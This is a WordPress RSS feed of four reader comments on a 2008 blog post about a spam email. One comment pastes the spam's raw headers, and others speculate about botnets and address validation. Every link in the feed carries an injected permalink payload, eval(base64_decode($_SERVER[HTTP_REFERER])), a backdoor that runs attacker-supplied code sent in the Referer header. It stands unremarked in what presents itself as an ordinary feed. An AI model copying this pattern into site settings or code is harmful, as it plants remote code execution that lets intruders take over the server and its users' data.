<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Subject: &#8220;Your Life is Crap&#8221;</title>
	<atom:link href="http://www.internetdefensetechnologies.com/blog/2008/05/23/your-life-is-crap/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.internetdefensetechnologies.com/blog/2008/05/23/your-life-is-crap/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
	<description></description>
	<pubDate>Fri, 12 Mar 2010 16:35:39 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
		<item>
		<title>By: Jeremy Johnstone</title>
		<link>http://www.internetdefensetechnologies.com/blog/2008/05/23/your-life-is-crap/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-27</link>
		<dc:creator>Jeremy Johnstone</dc:creator>
		<pubDate>Thu, 29 May 2008 06:39:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.internetdefensetechnologies.com/blog/?p=34#comment-27</guid>
		<description>Here's the raw view of one of the several I got (not the email address didn't exist, but still removed the domain on the To: anyway). I'm not able to see much use in this unless they are trying to blackflag fallbrooktaxi.com, but doubt that even would be successful with many if any blacklists.

--Raw Message--

Received: by 10.150.216.8 with SMTP id o8cs191804ybg;
        Mon, 26 May 2008 10:33:53 -0700 (PDT)
Received: by 10.90.94.2 with SMTP id r2mr367949agb.17.1211823233575;
        Mon, 26 May 2008 10:33:53 -0700 (PDT)
Return-Path: 
Received: from 45FDA9C943B44D6 ([222.212.48.96])
        by mx.google.com with ESMTP id x55si7917567hsx.5.2008.05.26.10.33.50;
        Mon, 26 May 2008 10:33:53 -0700 (PDT)
Received-SPF: neutral (google.com: 222.212.48.96 is neither permitted nor denied by best guess record for domain of elusiveness1784@fallbrooktaxi.com) client-ip=222.212.48.96;
Authentication-Results: mx.google.com; spf=neutral (google.com: 222.212.48.96 is neither permitted nor denied by best guess record for domain of elusiveness1784@fallbrooktaxi.com) smtp.mail=elusiveness1784@fallbrooktaxi.com
Received: from [222.212.48.96] by mail-fwd.sbc-webhosting.com; Tue, 27 May 2008 01:33:51 +0800
Message-ID: 
From: "Ashley May" 
To: 
Subject: best
Date: Tue, 27 May 2008 01:33:51 +0800
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4

your life is crap</description>
		<content:encoded><![CDATA[<p>Here&#8217;s the raw view of one of the several I got (not the email address didn&#8217;t exist, but still removed the domain on the To: anyway). I&#8217;m not able to see much use in this unless they are trying to blackflag fallbrooktaxi.com, but doubt that even would be successful with many if any blacklists.</p>
<p>&#8211;Raw Message&#8211;</p>
<p>Received: by 10.150.216.8 with SMTP id o8cs191804ybg;<br />
        Mon, 26 May 2008 10:33:53 -0700 (PDT)<br />
Received: by 10.90.94.2 with SMTP id r2mr367949agb.17.1211823233575;<br />
        Mon, 26 May 2008 10:33:53 -0700 (PDT)<br />
Return-Path:<br />
Received: from 45FDA9C943B44D6 ([222.212.48.96])<br />
        by mx.google.com with ESMTP id x55si7917567hsx.5.2008.05.26.10.33.50;<br />
        Mon, 26 May 2008 10:33:53 -0700 (PDT)<br />
Received-SPF: neutral (google.com: 222.212.48.96 is neither permitted nor denied by best guess record for domain of <a href="mailto:elusiveness1784@fallbrooktaxi.com">elusiveness1784@fallbrooktaxi.com</a>) client-ip=222.212.48.96;<br />
Authentication-Results: mx.google.com; spf=neutral (google.com: 222.212.48.96 is neither permitted nor denied by best guess record for domain of <a href="mailto:elusiveness1784@fallbrooktaxi.com">elusiveness1784@fallbrooktaxi.com</a>) smtp.mail=elusiveness1784@fallbrooktaxi.com<br />
Received: from [222.212.48.96] by mail-fwd.sbc-webhosting.com; Tue, 27 May 2008 01:33:51 +0800<br />
Message-ID:<br />
From: &#8220;Ashley May&#8221;<br />
To:<br />
Subject: best<br />
Date: Tue, 27 May 2008 01:33:51 +0800<br />
MIME-Version: 1.0<br />
Content-Type: text/plain;<br />
  charset=&#8221;iso-8859-1&#8243;<br />
Content-Transfer-Encoding: 7bit<br />
X-Priority: 3<br />
X-MSMail-Priority: Normal<br />
X-Mailer: Microsoft Outlook Express 4.72.2106.4<br />
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4</p>
<p>your life is crap</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Rick</title>
		<link>http://www.internetdefensetechnologies.com/blog/2008/05/23/your-life-is-crap/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-25</link>
		<dc:creator>Rick</dc:creator>
		<pubDate>Mon, 26 May 2008 21:21:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.internetdefensetechnologies.com/blog/?p=34#comment-25</guid>
		<description>Money??  Not now..

I suppose they are improving their tecnology.

They need thousand , maybe millions, computers to send spam.

Computer have a trojan or something similar and spammers can manipulate them to send spam.

Pherhaps only a joke or a mistake...</description>
		<content:encoded><![CDATA[<p>Money??  Not now..</p>
<p>I suppose they are improving their tecnology.</p>
<p>They need thousand , maybe millions, computers to send spam.</p>
<p>Computer have a trojan or something similar and spammers can manipulate them to send spam.</p>
<p>Pherhaps only a joke or a mistake&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: chukaman</title>
		<link>http://www.internetdefensetechnologies.com/blog/2008/05/23/your-life-is-crap/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-24</link>
		<dc:creator>chukaman</dc:creator>
		<pubDate>Mon, 26 May 2008 19:00:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.internetdefensetechnologies.com/blog/?p=34#comment-24</guid>
		<description>To see if the address they sent it to is valid. I just got one, which is strange as Google usually manages to stop 100% of my spam.</description>
		<content:encoded><![CDATA[<p>To see if the address they sent it to is valid. I just got one, which is strange as Google usually manages to stop 100% of my spam.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: AJ Quick</title>
		<link>http://www.internetdefensetechnologies.com/blog/2008/05/23/your-life-is-crap/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-23</link>
		<dc:creator>AJ Quick</dc:creator>
		<pubDate>Mon, 26 May 2008 17:19:55 +0000</pubDate>
		<guid isPermaLink="false">http://www.internetdefensetechnologies.com/blog/?p=34#comment-23</guid>
		<description>I just got one of these emails.

It didn't even have a URL or anything in it.</description>
		<content:encoded><![CDATA[<p>I just got one of these emails.</p>
<p>It didn&#8217;t even have a URL or anything in it.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
